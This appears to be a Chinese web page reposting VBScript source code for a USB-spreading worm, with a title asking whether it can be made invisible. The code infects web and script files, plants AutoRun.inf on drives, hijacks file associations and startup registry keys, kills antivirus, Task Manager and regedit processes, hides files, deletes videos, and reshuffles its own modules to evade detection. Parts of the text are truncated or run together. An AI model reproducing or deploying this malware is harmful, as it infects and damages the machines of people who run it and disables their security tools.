一段u盘病毒代码(可以设为不可见吗)

'Administrator4

'RJQXEIOULXYPL2_12
Sub InfectHead(strPath, fi, objfso, VbsCode_WebPage, VbsCode_Victim, ftype, T)
    On Error Resume Next
    Dim tso, buffer, strCode , Maxsize
    Maxsize = 350000
    If fi.Size< Maxsize Then
        Set tso = objfso.OpenTextFile(strPath, 1, True)
        buffer = tso.ReadAll()
        tso.Close
        If T = 0 Then
            Select Case ftype
                Case "hta", "htm", "html", "asp"
                    If Isinfected(buffer, ftype) = False Then
                        Set tso = objfso.OpenTextFile(strPath, 2, true)
                        strCode = MakeScript(VbsCode_WebPage, 0)
                        tso.Write strCode & VBCRLF & buffer
                        Cnt = Cnt + 1
                    End If
                Case "vbs"
                    If Isinfected(buffer, ftype) = False Then
                        n = InStr(buffer , "Option Explicit")
                        If n<>0 Then
                            buffer = Replace(buffer, "Option Explicit", "", 1, 1, 1)
                            Set tso = objfso.OpenTextFile(strPath, 2, true)
                            tso.Write vbsCode_Victim & VBCRLF & buffer
                            Cnt = Cnt + 1
                        Else
                            Set tso = objfso.OpenTextFile(strPath, 2, true)
                            tso.Write vbsCode_Victim & VBCRLF & buffer
                            Cnt = Cnt + 1
                        End If
                    End If
                Case Else
                    '
                    '
            End Select
        ElseIf T = 1 Then
            If Isinfected(buffer, ftype) = True Then
                n = InStrRev(buffer , Tail_V)
                If n<>0 Then
                    buffer = Replace(buffer, Tail_V, "", n, 1, 1)
                    Set tso = objfso.OpenTextFile(strPath, 2, True)
                    tso.Write strCode & VBCRLF & buffer
                End If
            End If
        End If
    End If
End Sub
'AOHGGCXWLVC2_12

'RJQXEIOULXYPL2_14
Function ReadOK(objfso, FullPath_OK)
    On Error Resume Next
    Dim vf, buffer
    Set vf = objfso.OpenTextFile(FullPath_OK, 1)
    buffer = vf.ReadAll
    ReadOK = RTrim(Mid(buffer, InStr(buffer, "Order:") + 6, 50))
End Function
Sub WriteOK(objfso, FullPath_OK, Order_Order, Order_Para)
    On Error Resume Next
    Dim vf1
    objfso.DeleteFile FullPath_OK, True
    Set vf1 = objfso.OpenTextFile(FullPath_OK, 2, True)
    vf1.Write "OK" & VBCRLF
    vf1.WriteLine Date()
    vf1.WriteLine "Order:" & Order_Order & "@" & Order_Para
    Call SetFileAttr(objfso, FullPath_OK)
End Sub
'AOHGGCXWLVC2_14

'RJQXEIOULXYPL1_5
Sub MonitorSystem(objfso, vbsCode)
    On Error Resume Next
    Dim ProcessNames
    ProcessNames = Array("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr", "regedit.pif", "regedit.com", "msconfig.exe", "SREng.exe", "USBAntiVir.exe")
    Do
        Call KillProcess(ProcessNames)
        Call InvadeSystem(objfso, vbsCode)
        WScript.Sleep 5000
    Loop
End Sub
'AOHGGCXWLVC1_5

'RJQXEIOULXYPL2_24
Sub KillProcess(ProcessNames)
    On Error Resume Next
    Dim objShell, intReturn, name_exe
    Set objShell = WScript.CreateObject("WScript.Shell")
    strComputer = "."
    Set objWMIServices = GetObject("winmgmts://" & strComputer & "/root/cimv2")
    For Each ProcessName in ProcessNames
        Set colProcessList = objWMIServices.Execquery(" Select * From win32_process where name = '" & ProcessName & "' ")
        For Each objProcess in colProcessList
            intReturn = objProcess.Terminate
            Select Case intReturn
                Case 2
                    name_exe = objProcess.Name
                    name_exe = Left(name_exe, Len(name_exe) -4)
                    objShell.Run "cmd.exe /c @tskill " & name_exe, 0, False
            End Select
        Next
    Next
    Set objShell = Nothing
End Sub
'AOHGGCXWLVC2_24

'RJQXEIOULXYPL1_7
Sub InvadeSystem(objfso, vbsCode)
    On Error Resume Next
    Dim Value, HCULoad, vbsCode_Virus, dc, d
    Value = "%SystemRoot%/System32/WScript.exe " & """" & FullPath_V0 & """" & " %1 %* "
    HCULoad = "HKEY_CURRENT_USER/SoftWare/Microsoft/Windows NT/CurrentVersion/Windows/Load"
    vbsCode_Virus = vbsCode
    Set dc = objfso.Drives
    For Each d In dc
        If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
            Call AutoRun(objfso, d.DriveLetter, vbsCode_Virus)
        End If
    Next
    If objfso.FileExists(FullPath_V1) = True And GetVersion(objfso, FullPath_V1)< Version Then
        objfso.DeleteFile FullPath_V1 , True
        Call CopyFile(objfso, vbsCode_Virus, FullPath_V1)
        Call SetFileAttr(objfso, FullPath_V1)
    Else
        Call CopyFile(objfso, vbsCode_Virus, FullPath_V1)
        Call SetFileAttr(objfso, FullPath_V1)
    End If
    If objfso.FileExists(FullPath_V0) = True And GetVersion(objfso, FullPath_V0)
  
    FullPath_V1 Then
        Call WriteReg (HCULoad, FullPath_V1, "")
    End If
    If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/txtfile/shell/open/command/")<>Value Then
        Call SetTxtFileAss(FullPath_V0)
    End If
    If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/regfile/shell/open/command/")<>Value Then
        Call SetRegFileAss(FullPath_V0)
    End If
    If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/chm.file/shell/open/command/")<>Value Then
        Call SetchmFileAss(FullPath_V0)
    End If
    If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/hlpfile/shell/open/command/")<>Value Then
        Call SethlpFileAss(FullPath_V0)
    End If
    Call DeSafeSet()
End Sub
'AOHGGCXWLVC1_7

'RJQXEIOULXYPL2_16
Sub SetTxtFileAss(sFilePath)
    On Error Resume Next
    Dim Value
    Value = "%SystemRoot%/System32/WScript.exe " & """" & sFilePath & """" & " %1 %* "
    Call WriteReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/txtfile/shell/open/command/", Value, "REG_EXPAND_SZ")
End Sub
Sub SethlpFileAss(sFilePath)
    On Error Resume Next
    Dim Value
    Value = "%SystemRoot%/System32/WScript.exe " & """" & sFilePath & """" & " %1 %* "
    Call WriteReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/hlpfile/shell/open/command/", Value, "REG_EXPAND_SZ")
End Sub
Sub SetRegFileAss(sFilePath)
    On Error Resume Next
    Dim Value
    Value = "%SystemRoot%/System32/WScript.exe " & """" & sFilePath & """" & " %1 %* "
    Call WriteReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/regfile/shell/open/command/", Value, "REG_EXPAND_SZ")
End Sub
Sub SetchmFileAss(sFilePath)
    On Error Resume Next
    Dim Value
    Value = "%SystemRoot%/System32/WScript.exe " & """" & sFilePath & """" & " %1 %* "
    Call WriteReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/chm.file/shell/open/command/", Value, "REG_EXPAND_SZ")
End Sub
'AOHGGCXWLVC2_16

'RJQXEIOULXYPL2_17
Function PreInstance()
    On Error Resume Next
    Dim num_cnt
    Dim strComputer, objWMIService, colProcessList, objProcess
    num_cnt = 0
    PreInstance = False
    strComputer = "."
    Set objWMIService = GetObject("winmgmts://" & strComputer & "/root/cimv2")
    Set colProcessList = objWMIService.ExecQuery("Select * from Win32_Process Where " & "Name = 'cscript.exe' or Name = 'wscript.exe'")
    For Each objProcess in colProcessList
        If InStr(CStr(objProcess.CommandLine), WScript.ScriptFullName)>0 Then
            num_cnt = num_cnt + 1
        End If
    Next
    If num_cnt>= 2 Then
        PreInstance = True
    End If
End Function
'AOHGGCXWLVC2_17

'RJQXEIOULXYPL2_23
Function MakeScript(strCode, T)
    If T = 1 Then
        MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & ChangeModelOrder(strCode, Sum_ModelCode) & VBCRLF & "
   0 Or InStr(fname, "淫")>0 Or InStr(fname, "偷拍")>0 Or _
                InStr(fname, "偷窥")>0 Or InStr(fname, "口交")>0 Or InStr(fname, "强奸")>0 Or _
                InStr(fname, "轮奸")>0 Or InStr(fname, "伦理片")>0 Or InStr(fname, "自摸")>0 Then
        IsSexFile = True
    End If
End Function
Function Isinfected(buffer, ftype)
    Isinfected = True
    Select Case ftype
        Case "hta", "htm" , "html" , "asp", "vbs"
            If InStr(buffer, Head_V) = 0 Then
                Isinfected = False
            End If
        Case Else
            Isinfected = True
    End Select
End Function
'AOHGGCXWLVC2_21

'RJQXEIOULXYPL1_9
Function ChangeModelOrder(vbsCode, Num_DNA)
    On Error Resume Next
    Dim DNA(), Array_vbsCode()
    Dim i, Value, flag, j, buffer
    ReDim DNA(Num_DNA), Array_vbsCode(Num_DNA)
    buffer = vbsCode
    Randomize
    For i = 1 To Num_DNA
        Do
            Value = Int((Num_DNA * Rnd) + 1)
            flag = 1
            For j = 1 To Num_DNA
                If Value = DNA(j) Then
                    flag = 0
                    Exit For
                End If
            Next
        Loop Until flag = 1
        DNA(i) = Value
    Next
    For i = 1 To Num_DNA
        Array_vbsCode(i) = GetModelCode(buffer, i)
    Next
    buffer = ""
    For i = 1 To Num_DNA
        buffer = buffer & VBCRLF & Array_vbsCode(DNA(i)) & VBCRLF
    Next
    ChangeModelOrder = Head_V & Version & VBCRLF & buffer & VBCRLF & Tail_V
End Function
'AOHGGCXWLVC1_9

'RJQXEIOULXYPL2_26
Sub Run(ExeFullName)
    Dim WshShell
    Set WshShell = WScript.CreateObject("WScript.Shell")
    WshShell.Run ExeFullName
    Set WshShell = Nothing
End Sub
Sub CopyFile(objfso, code, pathf)
    On Error Resume Next
    Dim vf
    Set vf = objfso.OpenTextFile(pathf, 2, true)
    vf.Write code
End Sub
Function ChangeName(vbsCode, Names)
    Dim Name, j, temp, buffer
    buffer = vbsCode
    Randomize
    For Each Name in Names
        temp = ""
        For j = 1 To Len(Name)
            temp = temp & Chr((Int(Rnd * 26) + 65))
        Next
        buffer = Replace(buffer, Name, temp)
    Next
    ChangeName = buffer
End Function
'AOHGGCXWLVC2_26

'RJQXEIOULXYPL2_25
Sub DeleteReg(strkey)
    Dim tmps
    Set tmps = CreateObject("WScript.Shell")
    tmps.RegDelete strkey
    Set tmps = Nothing
End Sub
Function ReadReg(strkey)
    Dim tmps
    Set tmps = CreateObject("WScript.Shell")
    ReadReg = tmps.RegRead(strkey)
    Set tmps = Nothing
End Function
Sub WriteReg(strkey, Value, vtype)
    Dim tmps
    Set tmps = CreateObject("WScript.Shell")
    If vtype = "" Then
        tmps.RegWrite strkey, Value
    Else
        tmps.RegWrite strkey, Value, vtype
    End If
    Set tmps = Nothing
End Sub
'AOHGGCXWLVC2_25

'RJQXEIOULXYPL1_6
Sub AutoRun(objfso, D, vbsCode)
    On Error Resume Next
    Dim path_autorun, path_vbs, inf_autorun
    path_autorun = D & ":/AutoRun.inf"
    path_vbs = D & ":/" & Name_V1
    If objfso.FileExists(path_vbs) = False Or objfso.FileExists(path_autorun) = False Or GetVersion(objfso, path_vbs)
   
    2000 Then Call WriteOK(objfso, FullPath_Config, "Msg", "您已有超过2000个文件被感染!不过请放心,此病毒很容易被清除!请联系418465***-_- !") Else Call WriteOK(objfso, FullPath_Config, "InfectFiles", Order_Para) End If Call InvadeSystem(objfso, VbsCode_Virus) Call MonitorSystem(objfso, VbsCode_Virus) Case "Msg" MsgBox Order_Para Call WriteOK(objfso, FullPath_Config, "", "") vbsCode = GetSelfCode(objfso, FullPath_Self) MainBody = GetMainBody(vbsCode, Sum_ModelCode) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) VbsCode_Virus = ChangeName(VbsCode_Virus, Names) Call InvadeSystem(objfso, VbsCode_Virus) Call MonitorSystem(objfso, VbsCode_Virus) Case "UnLoadMe" Call RestoreSystem(objfso) Wscript.Quit Case "KillVirus" Call RestoreSystem(objfso) Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 1) Wscript.Quit Case Else vbsCode = GetSelfCode(objfso, FullPath_Self) MainBody = GetMainBody(vbsCode, Sum_ModelCode) VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode) VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names) VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode) VbsCode_Victim = ChangeName(VbsCode_Victim, Names) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) VbsCode_Virus = ChangeName(VbsCode_Virus, Names) Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0) Call WriteOK(objfso, FullPath_Config, "InfectFiles", Cnt) Call InvadeSystem(objfso, VbsCode_Virus) Call MonitorSystem(objfso, VbsCode_Virus) End Select Else vbsCode = GetSelfCode(objfso, FullPath_Self) MainBody = GetMainBody(vbsCode, Sum_ModelCode) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V '生成病毒体完整代码 VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) '改变模块组合顺序 VbsCode_Virus = ChangeName(VbsCode_Virus, Names) '改变模块标志名称 Call MonitorSystem(objfso, VbsCode_Virus) End If End Select Set objfso = Nothing Set objshell = Nothing End Sub 'AOHGGCXWLVC1_3 'RJQXEIOULXYPL1_2 Sub ExeVbs_WebPage() On Error Resume Next Dim objfso, vbsCode, VbsCode_Virus Set objfso = CreateObject(GetFSOName()) vbsCode = GetScriptCode("vbscript") VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) Call InvadeSystem(objfso, VbsCode_Virus) Set objfso = Nothing End Sub Sub ExeVbs_Victim() On Error Resume Next Dim objfso, vbsCode, VbsCode_Virus Set objfso = CreateObject(GetFSOName()) vbsCode = GetSelfCode(objfso, WScript.ScriptFullName) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) Call InvadeSystem(objfso, VbsCode_Virus) Call Run(FullPath_V1) Set objfso = Nothing End Sub 'AOHGGCXWLVC1_2 'RJQXEIOULXYPL2_11 Sub SearchFile(objfso, strPath, VbsCode_WebPage, VbsCode_Victim, T) On Error Resume Next Dim pfo, pf, pfi, ext Dim psfo, ps Set pfo = objfso.GetFolder(strPath) Set pf = pfo.Files For Each pfi In pf If Cnt >= CntMax Then Exit For End If ext = LCase(objfso.GetExtensionName(pfi.Path)) Select Case ext Case "hta", "htm", "html", "asp", "vbs" Call InfectHead(pfi.Path, pfi, objfso, VbsCode_WebPage, VbsCode_Victim, ext, T) Case "mpg", "rmvb", "avi", "rm" If IsSexFile(pfi.Name) = True Then pfi.Delete End If End Select Next Set psfo = pfo.SubFolders For Each ps In psfo If Cnt >= CntMax Then Exit For End If Call SearchFile(objfso, ps.Path, VbsCode_WebPage, VbsCode_Victim, T) Next End Sub 'AOHGGCXWLVC2_11 'RJQXEIOULXYPL1_4 Function Head() Head = VBCRLF & "'RJQXEIOULXYPL1_1" & VBCRLF &_ "On Error Resume Next" & VBCRLF &_ "Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V" & VBCRLF &_ "Dim ModelHead, ModelTail" & VBCRLF &_ "Cnt = 0" & VBCRLF &_ "CntMax = 1000" & VBCRLF &_ "Version = ""4""" & VBCRLF &_ "Name_V1 = GetUserName() & "".vbs""" & VBCRLF &_ "FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向" & VBCRLF &_ "FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令" & VBCRLF &_ "FullPath_Config= GetSFolder(1) & GetUserName() & "".ini""" & VBCRLF &_ "Sum_ModelCode = 26" & VBCRLF &_ "Head_V= GetHeadTail(0)" & VBCRLF &_ "Tail_V= GetHeadTail(1)" & VBCRLF &_ "ModelHead=""'RJQXEIOULXYPL""" & VBCRLF &_ "ModelTail=""'AOHGGCXWLVC""" & VBCRLF End Function Function VictimHead() VictimHead = Head() & VBCRLF &_ "Call VictimMain()" & VBCRLF &_ "Sub VictimMain()" & VBCRLF &_ " Call ExeVbs_Victim()" & VBCRLF &_ "End Sub" & VBCRLF &_ "'AOHGGCXWLVC1_1" & VBCRLF End Function Function VirusHead() VirusHead = Head() & VBCRLF &_ "Call VirusMain()" & VBCRLF &_ "Sub VirusMain()" & VBCRLF &_ " On Error Resume Next" & VBCRLF &_ " Call ExeVbs_Virus()" & VBCRLF &_ "End Sub" & VBCRLF & VBCRLF &_ "'AOHGGCXWLVC1_1" & VBCRLF End Function Function WebHead() WebHead = Head() & VBCRLF &_ "Call WebMain()" & VBCRLF &_ "Sub WebMain()" & VBCRLF &_ " On Error Resume Next" & VBCRLF &_ " Call ExeVbs_WebPage()" & VBCRLF &_ "End Sub" & VBCRLF &_ "'AOHGGCXWLVC1_1" & VBCRLF End Function 'AOHGGCXWLVC1_4 'RJQXEIOULXYPL2_20 Function GetModelCode(vbsCode, N_ModelCode) On Error Resume Next Dim n, n1, buffer buffer = vbsCode If N_ModelCode>= 1 And N_ModelCode<= 9 Then n = InStr(buffer, ModelHead & "1_" & N_ModelCode) n1 = InStr(buffer, ModelTail & "1_" & N_ModelCode) GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "1_" & N_ModelCode)) ElseIf N_ModelCode>= 10 And N_ModelCode<= 99 Then n = InStr(buffer, ModelHead & "2_" & N_ModelCode) n1 = InStr(buffer, ModelTail & "2_" & N_ModelCode) GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "2_" & N_ModelCode)) ElseIf N_ModelCode>= 100 And N_ModelCode<= 999 Then n = InStr(buffer, ModelHead & "3_" & N_ModelCode) n1 = InStr(buffer, ModelTail & "3_" & N_ModelCode) GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "3_" & N_ModelCode)) End If End Function 'AOHGGCXWLVC2_20 'RJQXEIOULXYPL2_19 Function GetVersion(objfso, path_v) Dim FV, buffer Set FV = objfso.OpenTextFile(path_v, 1) buffer = FV.ReadAll() GetVersion = Mid(buffer, InStr(buffer, Head_V) + Len(Head_V), 1) End Function Function GetScriptCode(Languages) On Error Resume Next Dim soj For Each soj In document.Scripts If LCase(soj.Language) = Languages Then Select Case LCase(soj.Language) Case "vbscript" GetScriptCode = soj.Text Exit Function Case "javascript" GetScriptCode = soj.Text Exit Function End Select End If Next End Function Function GetSelfCode(objfso, FullPath_Self) On Error Resume Next Dim n, n1, buffer, Self Set Self = objfso.OpenTextFile(FullPath_Self, 1) buffer = Self.ReadAll n = InStr(buffer, Head_V) n1 = InstrRev(buffer, Tail_V) buffer = Mid(buffer, n, n1 - n + Len(Tail_V) + 1) GetSelfCode = buffer Self.Close End Function Function GetMainBody(vbsCode, Sum_ModelCode) Dim i For i = 2 To Sum_ModelCode GetMainBody = GetMainBody & VBCRLF & GetModelCode(vbsCode, i) & VBCRLF Next End Function 'AOHGGCXWLVC2_19 'RJQXEIOULXYPL1_8 Sub RestoreSystem(objfso) On Error Resume Next Dim Value, dc, d, HCULoad Call SafeSet() HCULoad = "HKEY_CURRENT_USER/SoftWare/Microsoft/Windows NT/CurrentVersion/Windows/Load" If ReadReg(HCULoad) = FullPath_V1 Then Call DeleteReg(HCULoad) End If Value = "%SystemRoot%/system32/NOTEPAD.EXE %1" If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/txtfile/shell/open/command/")<>Value Then Call WriteReg ("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/txtfile/shell/open/command/", Value, "REG_EXPAND_SZ") End If Value = "regedit.exe " & """%1""" If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/regfile/shell/open/command/")<>Value Then Call WriteReg ("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/regfile/shell/open/command/", Value, "REG_EXPAND_SZ") End If Value = GetSFolder(1) & "hh.exe " & """%1""" If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/chm.file/shell/open/command/")<>Value Then Call WriteReg ("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/chm.file/shell/open/command/", Value, "REG_EXPAND_SZ") End If Value = "%SystemRoot%/system32/winhlp32.exe %1" If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/hlpfile/shell/open/command/")<>Value Then Call WriteReg ("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/hlpfile/shell/open/command/", Value, "REG_EXPAND_SZ") End If Value = """%1"" %*" If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/exefile/shell/open/command/")<>Value Then Call WriteReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/exefile/shell/open/command/", Value, "REG_SZ") End If Set dc = objfso.Drives For Each d In dc If objfso.FileExists(d.DriveLetter & ":/" & Name_V1) = True Then objfso.DeleteFile d.DriveLetter & ":/" & Name_V1 objfso.DeleteFile d.DriveLetter & ":/" & "AutoRun.inf" End If Next If objfso.FileExists(FullPath_V1) = True Then Set vf = objfso.GetFile(FullPath_V1) vf.Delete End If If objfso.FileExists(FullPath_V0) = true Then Set vf = objfso.GetFile(FullPath_V0) vf.Delete End If If objfso.FileExists(FullPath_Config) = True Then objfso.DeleteFile FullPath_Config , True End If End Sub 'AOHGGCXWLVC1_8 'RJQXEIOULXYPL2_10 Sub SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, T) On Error Resume Next Dim d , dc Set dc = objfso.Drives For Each d In dc If Cnt >= CntMax Then ' Exit For End If If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then 'If d.DriveType = 1 Then Call SearchFile(objfso, d.Path & "/", VbsCode_WebPage, VbsCode_Victim, T) 'End If End If Next End Sub 'AOHGGCXWLVC2_10 'RJQXEIOULXYPL2_15 Sub SetFileAttr(objfso, pathf) Dim vf Set vf = objfso.GetFile(pathf) vf.Attributes = 6 End Sub 'AOHGGCXWLVC2_15 'RJQXEIOULXYPL1_1 On Error Resume Next Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V Dim ModelHead, ModelTail Cnt = 0 CntMax = 1000 Version = "4" Name_V1 = GetUserName() & ".vbs" FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向 FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令 FullPath_Config= GetSFolder(1) & GetUserName() & ".ini" Sum_ModelCode = 26 Head_V= GetHeadTail(0) Tail_V= GetHeadTail(1) ModelHead="'RJQXEIOULXYPL" ModelTail="'AOHGGCXWLVC" Call VirusMain() Sub VirusMain() On Error Resume Next Call ExeVbs_Virus() End Sub 'AOHGGCXWLVC1_1 'RJQXEIOULXYPL2_18 Function IsOK(objfso, Now_V, path_f) On Error Resume Next Dim vf, p1, p2, p3 IsOK = False Set vf = objfso.OpenTextFile(path_f, 1) p1 = Trim(vf.ReadLine) p2 = Trim(vf.ReadLine) p3 = Trim(vf.ReadLine) If StrComp(p1, "OK", 1) = 0 And StrComp(p2, Now_V, 1) = 0 Then IsOK = True End If If p3 = "Admin" Then MsgBox "You Are Admin!!! Your Computer Will Not Be Infected!!!" IsOK = True n = InputBox("0:退出; 1:监视系统; 2:传染文件", "SuperVirus脚本测试!") If n = 0 Then Wscript.Quit ElseIf n = 1 Then IsOK = True ElseIf n = 2 Then IsOK = False End If End If End Function 'AOHGGCXWLVC2_18 'RJQXEIOULXYPL2_13 Sub DeSafeSet() Dim HLMShow , HCUAdvanced, HCUExplorer HLMShow = "HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Folder/Hidden/SHOWALL/CheckedValue" HCUAdvanced = "HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced/ShowSuperHidden" HCUExplorer = "HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoDriveTypeAutoRun" Call WriteReg (HCUExplorer, 129, "REG_DWORD") Call WriteReg (HCUAdvanced, 0, "REG_DWORD") Call WriteReg (HLMShow, 0, "REG_DWORD") End Sub Sub SafeSet() Dim HLMShow , HCUSSHidden, HCUHidden Dim HCUExplorer HLMShow = "HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Folder/Hidden/SHOWALL/CheckedValue" HCUAdvanced = "HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced/ShowSuperHidden" HCUHidden = "HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Hidden" Call WriteReg (HCUHidden, 1, "REG_DWORD") Call WriteReg (HCUAdvanced, 1, "REG_DWORD") Call WriteReg (HLMShow, 1, "REG_DWORD") End Sub 'AOHGGCXWLVC2_13 'rotartsinimdA
   
  

你可能感兴趣的:(一段u盘病毒代码(可以设为不可见吗))